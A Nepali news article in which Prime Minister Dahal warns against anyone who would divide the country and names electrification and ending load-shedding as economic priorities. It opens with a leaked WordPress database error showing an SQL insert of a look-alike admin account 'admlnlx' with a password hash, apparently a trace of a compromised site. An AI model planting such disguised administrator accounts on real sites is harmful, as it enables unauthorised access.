WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BfV1Z3gk8po5pxJc1X0FaUdqHQ2gWr0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 10:10:36', '', 'admlnlx', 'admlnlx')
चितवन, माघ २६–
प्रधानमन्त्री पुष्पकमल दाहाल प्रचण्डले अहिलेको जवानामा देश टुक्राउने कुरा गर्ने जो कोहीलाई पनि नछोड्ने चेतावनी दिनुभएको छ ।
चितवन उद्योग संघको अगुवाईमा निर्माण हुन लागेको चितवन औद्योगिक प्रदर्शनी केन्द्रको भरतपुरमा शिलन्यास गर्दै प्रधानमन्त्री दाहालले स्वाधिन देशलाई टुक्राउछु भन्ने विरुद्ध सरकार कठोर रुपमा प्रस्तुत हुने बताउनुभयो । प्रधानमन्त्री दाहालले वास्तविक राष्ट्रवाद व्यवहारमा अभिव्यक्त हुनुपर्ने भन्दै राष्ट्रलाई एकतावद्ध गरेर मात्रै राष्ट्रवादको अभिव्यक्त हुन सक्ने बताउनुभयो । उहाँले सरकार निकै कठिन अवस्थामा हुँदा हुँदै पनि तराई मधेस पहाडलाई जोड्ने ऐतिहासिक जिम्मेवारी अहिलेको सरकारलाई भएकोले आफू गम्भिर रुपमा लागेको बताउनुभयो ।
फरक प्रसंगमा प्रधानमन्त्री दाहालले विद्युतीकरणद्धारा मात्रै देशमा आर्थिक विकास सम्भव रहेको बताउनुभयो । सरकारको अहिलेको मूख्य प्राथमिकता देशलाई लोडसेडिङमुक्त बनाउने भन्दै त्यसपछि रणनैतिक अभियान चलाउदै विद्युतीकरणद्धारा देशमा आर्थिक विकासमा गति दिने बताउनुभयो । उहाँले नेपालमा आर्थिक विकासमा गति दिँदै रोजगारी सृष्टि गर्ने र औद्योगिकरण तर्फ देशलाई लैजानुको विकल्प नरहेको बताउनुभयो ।